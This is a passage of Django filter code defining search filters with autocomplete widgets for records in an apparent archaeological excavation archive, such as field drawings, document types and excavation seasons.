collection__name="source_original_copy_edited_copy"
),
help_text=Convolutecards._meta.get_field('source_original_copy_edited_copy').help_text,
label=Convolutecards._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Convolutecards._meta.get_field('original_material').help_text,
label=Convolutecards._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Convolutecards._meta.get_field('excavation_post_excavation').help_text,
label=Convolutecards._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Convolutecards
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'excavation_id',
'creation_year_original',
'season',
'filename_document_id',
'convolute_inventory_number',
'convolute_subnumber',
'filename_old',
'creation_date_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'month',
'position',
'lowest_height_meters_standard_elevation_zero',
'maximum_height_meters_standard_elevation_zero',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]


class DatenbaseListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('legacy_id').help_text,
label=Datenbase._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_name').help_text,
label=Datenbase._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_directory').help_text,
label=Datenbase._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_type').help_text,
label=Datenbase._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Datenbase._meta.get_field('fc_filename').help_text,
label=Datenbase._meta.get_field('fc_filename').verbose_name
)
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('fc_extension').help_text,
        label=Datenbase._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('filename').help_text,
        label=Datenbase._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('document_id').help_text,
        label=Datenbase._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('document_title').help_text,
        label=Datenbase._meta.get_field('document_title').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('creation_year_original').help_text,
        label=Datenbase._meta.get_field('creation_year_original').verbose_name
    )
    path_filename_old = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('path_filename_old').help_text,
        label=Datenbase._meta.get_field('path_filename_old').verbose_name
    )
    path_filename_arche = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('path_filename_arche').help_text,
        label=Datenbase._meta.get_field('path_filename_arche').verbose_name
    )
    relatedto = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('relatedto').help_text,
        label=Datenbase._meta.get_field('relatedto').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('original_comment').help_text,
        label=Datenbase._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Datenbase._meta.get_field('digitisation_comment').help_text,
        label=Datenbase._meta.get_field('digitisation_comment').verbose_name
    )
    file_extension_original = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_original"
        ),
        help_text=Datenbase._meta.get_field('file_extension_original').help_text,
        label=Datenbase._meta.get_field('file_extension_original').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_original",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension_archivalobject"
        ),
        help_text=Datenbase._meta.get_field('file_extension_archivalobject').help_text,
        label=Datenbase._meta.get_field('file_extension_archivalobject').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=Datenbase._meta.get_field('copyright').help_text,
        label=Datenbase._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Datenbase._meta.get_field('access').help_text,
        label=Datenbase._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=Datenbase._meta.get_field('site_id').help_text,
        label=Datenbase._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    find_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="find_material"
        ),
        help_text=Datenbase._meta.get_field('find_material').help_text,
        label=Datenbase._meta.get_field('find_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/find_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_post_excavation"
        ),
        help_text=Datenbase._meta.get_field('excavation_post_excavation').help_text,
        label=Datenbase._meta.get_field('excavation_post_excavation').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = Datenbase
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'creator_original',
            'creator_archivalobject',
            'filename',
            'document_id',
            'document_title',
            'creation_year_original',
            'creation_date_archivalobject',
            'creation_date_metadata',
            'path_filename_old',
            'path_filename_arche',
            'excavation_object_id',
            'archaeological_object_id',
            'relatedto',
            'original_comment',
            'digitisation_comment',
            'document_type',
            'file_extension_original',
            'file_extension_archivalobject',
            'copyright',
            'access',
            'site_id',
            'find_material',
            'excavation_post_excavation',
        ]


class Document4DPuzzleIDListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('legacy_id').help_text,
        label=Document4DPuzzleID._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('fc_name').help_text,
        label=Document4DPuzzleID._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('fc_directory').help_text,
        label=Document4DPuzzleID._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('fc_type').help_text,
        label=Document4DPuzzleID._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('fc_filename').help_text,
        label=Document4DPuzzleID._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('fc_extension').help_text,
        label=Document4DPuzzleID._meta.get_field('fc_extension').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('document_id').help_text,
        label=Document4DPuzzleID._meta.get_field('document_id').verbose_name
    )
    original_4dpuzzle_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('original_4dpuzzle_id').help_text,
        label=Document4DPuzzleID._meta.get_field('original_4dpuzzle_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('document_title').help_text,
        label=Document4DPuzzleID._meta.get_field('document_title').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('digitisation_comment').help_text,
        label=Document4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
    )
    corresponding_to = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Document4DPuzzleID._meta.get_field('corresponding_to').help_text,
        label=Document4DPuzzleID._meta.get_field('corresponding_to').verbose_name
    )

    class Meta:
        model = Document4DPuzzleID
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'document_type',
            'document_id',
            'original_4dpuzzle_id',
            'document_title',
            'digitisation_comment',
            'corresponding_to',
        ]


class DocumentTypesListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('legacy_id').help_text,
        label=DocumentTypes._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('fc_name').help_text,
        label=DocumentTypes._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('fc_directory').help_text,
        label=DocumentTypes._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('fc_type').help_text,
        label=DocumentTypes._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('fc_filename').help_text,
        label=DocumentTypes._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('fc_extension').help_text,
        label=DocumentTypes._meta.get_field('fc_extension').verbose_name
    )
    document_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('document_type').help_text,
        label=DocumentTypes._meta.get_field('document_type').verbose_name
    )
    document_maintype = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('document_maintype').help_text,
        label=DocumentTypes._meta.get_field('document_maintype').verbose_name
    )
    dt_abbr = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('dt_abbr').help_text,
        label=DocumentTypes._meta.get_field('dt_abbr').verbose_name
    )
    document_subtype = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('document_subtype').help_text,
        label=DocumentTypes._meta.get_field('document_subtype').verbose_name
    )
    ds_abbr = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('ds_abbr').help_text,
        label=DocumentTypes._meta.get_field('ds_abbr').verbose_name
    )
    description = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=DocumentTypes._meta.get_field('description').help_text,
        label=DocumentTypes._meta.get_field('description').verbose_name
    )
    analogue_borndigital = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="analogue_borndigital"
        ),
        help_text=DocumentTypes._meta.get_field('analogue_borndigital').help_text,
        label=DocumentTypes._meta.get_field('analogue_borndigital').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/analogue_borndigital",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = DocumentTypes
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'document_type',
            'document_maintype',
            'dt_abbr',
            'document_subtype',
            'ds_abbr',
            'description',
            'analogue_borndigital',
        ]


class ExcavationObjectIDListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('legacy_id').help_text,
        label=ExcavationObjectID._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('fc_name').help_text,
        label=ExcavationObjectID._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('fc_directory').help_text,
        label=ExcavationObjectID._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('fc_type').help_text,
        label=ExcavationObjectID._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('fc_filename').help_text,
        label=ExcavationObjectID._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('fc_extension').help_text,
        label=ExcavationObjectID._meta.get_field('fc_extension').verbose_name
    )
    excavation_object_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('excavation_object_id').help_text,
        label=ExcavationObjectID._meta.get_field('excavation_object_id').verbose_name
    )
    profile_orientation = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('profile_orientation').help_text,
        label=ExcavationObjectID._meta.get_field('profile_orientation').verbose_name
    )
    year = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('year').help_text,
        label=ExcavationObjectID._meta.get_field('year').verbose_name
    )
    season = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('season').help_text,
        label=ExcavationObjectID._meta.get_field('season').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationObjectID._meta.get_field('digitisation_comment').help_text,
        label=ExcavationObjectID._meta.get_field('digitisation_comment').verbose_name
    )
    excavation_object_type = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="excavation_object_type"
        ),
        help_text=ExcavationObjectID._meta.get_field('excavation_object_type').help_text,
        label=ExcavationObjectID._meta.get_field('excavation_object_type').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/excavation_object_type",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=ExcavationObjectID._meta.get_field('site_id').help_text,
        label=ExcavationObjectID._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    area = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="area"
        ),
        help_text=ExcavationObjectID._meta.get_field('area').help_text,
        label=ExcavationObjectID._meta.get_field('area').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/area",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    square_trench = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="square_trench"
        ),
        help_text=ExcavationObjectID._meta.get_field('square_trench').help_text,
        label=ExcavationObjectID._meta.get_field('square_trench').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/square_trench",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    planum = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="planum"
        ),
        help_text=ExcavationObjectID._meta.get_field('planum').help_text,
        label=ExcavationObjectID._meta.get_field('planum').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/planum",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = ExcavationObjectID
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'creator_metadata',
            'excavation_object_id',
            'profile_orientation',
            'excavation_id',
            'year',
            'season',
            'part_of_excavation_object_id',
            'digitisation_comment',
            'excavation_object_type',
            'site_id',
            'area',
            'square_trench',
            'planum',
        ]


class ExcavationSeasonsListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('legacy_id').help_text,
        label=ExcavationSeasons._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('fc_name').help_text,
        label=ExcavationSeasons._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('fc_directory').help_text,
        label=ExcavationSeasons._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('fc_type').help_text,
        label=ExcavationSeasons._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('fc_filename').help_text,
        label=ExcavationSeasons._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('fc_extension').help_text,
        label=ExcavationSeasons._meta.get_field('fc_extension').verbose_name
    )
    excavation_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('excavation_id').help_text,
        label=ExcavationSeasons._meta.get_field('excavation_id').verbose_name
    )
    grabungskampagnen = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('grabungskampagnen').help_text,
        label=ExcavationSeasons._meta.get_field('grabungskampagnen').verbose_name
    )
    year = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=ExcavationSeasons._meta.get_field('year').help_text,
        label=ExcavationSeasons._meta.get_field('year').verbose_name
    )
    season = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="season"
        ),
        help_text=ExcavationSeasons._meta.get_field('season').help_text,
        label=ExcavationSeasons._meta.get_field('season').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/season",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=ExcavationSeasons._meta.get_field('access').help_text,
        label=ExcavationSeasons._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )

    class Meta:
        model = ExcavationSeasons
        fields = [
            'id',
            'legacy_id',
            'fc_name',
            'fc_directory',
            'fc_type',
            'fc_filename',
            'fc_match',
            'excavation_id',
            'grabungskampagnen',
            'year',
            'season',
            'access',
        ]


class FielddrawingListFilter(django_filters.FilterSet):
    legacy_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('legacy_id').help_text,
        label=Fielddrawing._meta.get_field('legacy_id').verbose_name
    )
    fc_name = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('fc_name').help_text,
        label=Fielddrawing._meta.get_field('fc_name').verbose_name
    )
    fc_directory = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('fc_directory').help_text,
        label=Fielddrawing._meta.get_field('fc_directory').verbose_name
    )
    fc_type = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('fc_type').help_text,
        label=Fielddrawing._meta.get_field('fc_type').verbose_name
    )
    fc_filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('fc_filename').help_text,
        label=Fielddrawing._meta.get_field('fc_filename').verbose_name
    )
    fc_extension = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('fc_extension').help_text,
        label=Fielddrawing._meta.get_field('fc_extension').verbose_name
    )
    filename = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('filename').help_text,
        label=Fielddrawing._meta.get_field('filename').verbose_name
    )
    document_id = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('document_id').help_text,
        label=Fielddrawing._meta.get_field('document_id').verbose_name
    )
    document_title = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('document_title').help_text,
        label=Fielddrawing._meta.get_field('document_title').verbose_name
    )
    storage_folder_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('storage_folder_original').help_text,
        label=Fielddrawing._meta.get_field('storage_folder_original').verbose_name
    )
    original_material = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="original_material"
        ),
        help_text=Fielddrawing._meta.get_field('original_material').help_text,
        label=Fielddrawing._meta.get_field('original_material').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/original_material",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    original_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('original_inventory_number').help_text,
        label=Fielddrawing._meta.get_field('original_inventory_number').verbose_name
    )
    find_inventory_number = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('find_inventory_number').help_text,
        label=Fielddrawing._meta.get_field('find_inventory_number').verbose_name
    )
    amendment_date = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('amendment_date').help_text,
        label=Fielddrawing._meta.get_field('amendment_date').verbose_name
    )
    stratum_id_relative = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('stratum_id_relative').help_text,
        label=Fielddrawing._meta.get_field('stratum_id_relative').verbose_name
    )
    stratum_id_absolute_prepub = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('stratum_id_absolute_prepub').help_text,
        label=Fielddrawing._meta.get_field('stratum_id_absolute_prepub').verbose_name
    )
    stratum_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('stratum_comment').help_text,
        label=Fielddrawing._meta.get_field('stratum_comment').verbose_name
    )
    month = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('month').help_text,
        label=Fielddrawing._meta.get_field('month').verbose_name
    )
    scale = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('scale').help_text,
        label=Fielddrawing._meta.get_field('scale').verbose_name
    )
    original_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('original_comment').help_text,
        label=Fielddrawing._meta.get_field('original_comment').verbose_name
    )
    digitisation_comment = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('digitisation_comment').help_text,
        label=Fielddrawing._meta.get_field('digitisation_comment').verbose_name
    )
    creation_year_original = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('creation_year_original').help_text,
        label=Fielddrawing._meta.get_field('creation_year_original').verbose_name
    )
    season = django_filters.CharFilter(
        lookup_expr='icontains',
        help_text=Fielddrawing._meta.get_field('season').help_text,
        label=Fielddrawing._meta.get_field('season').verbose_name
    )
    file_extension = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="file_extension"
        ),
        help_text=Fielddrawing._meta.get_field('file_extension').help_text,
        label=Fielddrawing._meta.get_field('file_extension').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/file_extension",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    copyright = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="copyright"
        ),
        help_text=Fielddrawing._meta.get_field('copyright').help_text,
        label=Fielddrawing._meta.get_field('copyright').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/copyright",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    access = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="access"
        ),
        help_text=Fielddrawing._meta.get_field('access').help_text,
        label=Fielddrawing._meta.get_field('access').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/access",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    site_id = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="site_id"
        ),
        help_text=Fielddrawing._meta.get_field('site_id').help_text,
        label=Fielddrawing._meta.get_field('site_id').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/site_id",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    equipment_scan = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="equipment_scan"
        ),
        help_text=Fielddrawing._meta.get_field('equipment_scan').help_text,
        label=Fielddrawing._meta.get_field('equipment_scan').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/equipment_scan",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="source_original_copy_edited_copy"
        ),
        help_text=Fielddrawing._meta.get_field('source_original_copy_edited_copy').help_text,
        label=Fielddrawing._meta.get_field('source_original_copy_edited_copy').verbose_name,
        method=generous_concept_filter,
        widget=autocomplete.Select2Multiple(
            url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
            attrs={
                'data-placeholder': 'Autocomplete ...',
                'data-minimum-input-length': 2,
            },
        )
    )
    creator_scan = django_filters.ModelMultipleChoiceFilter(
        queryset=SkosConcept.objects.filter(
            collection__name="creator_scan"
        ),
